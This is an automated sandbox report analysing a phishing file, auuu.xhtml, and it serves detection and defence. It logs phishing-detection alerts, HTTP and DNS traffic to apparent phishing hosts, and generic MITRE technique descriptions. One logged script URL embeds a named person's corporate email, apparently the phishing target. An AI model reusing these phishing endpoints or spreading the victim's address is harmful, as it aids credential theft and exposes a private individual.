Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	05:12:56
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\auuu.xhtml"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Source: Yara match	File source: 0.3.pages.csv, type: HTML
Source: Yara match	File source: 0.4.pages.csv, type: HTML
Source: Yara match	File source: 0.6.pages.csv, type: HTML
Source: Yara match	File source: 0.5.pages.csv, type: HTML

Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=daria.czajkowska@rockwool.com
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=daria.czajkowska@rockwool.com
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=daria.czajkowska@rockwool.com
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=daria.czajkowska@rockwool.com
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=daria.czajkowska@rockwool.com

Source: auuu.xhtml	HTTP Parser: .location
Source: auuu.xhtml	HTTP Parser: .location

Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: HTML title missing

Source: auuu.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/auuu.xhtml	HTTP Parser: No <meta name="copyright".. found

Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49754 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49784 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49762 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49776 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49804 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49794 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49799 -> 104.168.138.190:443

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 185.174.100.20 185.174.100.20
Source: Joe Sandbox View	IP Address: 199.232.192.193 199.232.192.193

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 43.152.183.74
Source: unknown	TCP traffic detected without corresponding DNS query: 43.152.183.74
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.67
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.67
Source: unknown	TCP traffic detected without corresponding DNS query: 23.33.40.147
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.144.165
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.144.165
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /kuk/xls/k1u2k.js?uid=daria.czajkowska@rockwool.com HTTP/1.1Host: office.avcbtech.storeConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: sender.linxcoded.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=6ea51597d57187987fff4dc0e381fc69
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=6ea51597d57187987fff4dc0e381fc69
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=6ea51597d57187987fff4dc0e381fc69
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=6ea51597d57187987fff4dc0e381fc69
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=6ea51597d57187987fff4dc0e381fc69
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=6ea51597d57187987fff4dc0e381fc69
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: office.avcbtech.store
Source: global traffic	DNS traffic detected: DNS query: sender.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: i.imgur.com
Source: global traffic	DNS traffic detected: DNS query: server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: _8248._https.server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: avcbtech.site

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report auuu.xhtml

Overview

General Information

Detection

Signatures

Classification

Process Tree

